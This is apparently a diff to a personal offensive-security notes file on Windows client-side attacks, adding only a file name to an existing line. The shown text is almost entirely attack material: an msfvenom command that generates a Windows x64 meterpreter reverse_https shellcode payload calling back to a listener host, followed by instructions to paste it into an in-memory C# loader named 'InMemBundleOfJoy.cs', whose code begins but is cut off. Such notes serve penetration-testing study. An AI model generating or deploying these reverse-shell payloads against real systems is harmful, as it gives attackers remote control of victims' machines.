ggilligan12/offsec/notes/windows/client-side-attacks/powershell.md

 ```bash
 sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.1 LPORT=443 -f csharp
 ```
-We paste the output into relevant section of the following file, then save it as :
+We paste the output into relevant section of the following file, then save it as `InMemBundleOfJoy.cs`:
 ```csharp
 using System;
 using System.Diagnostics;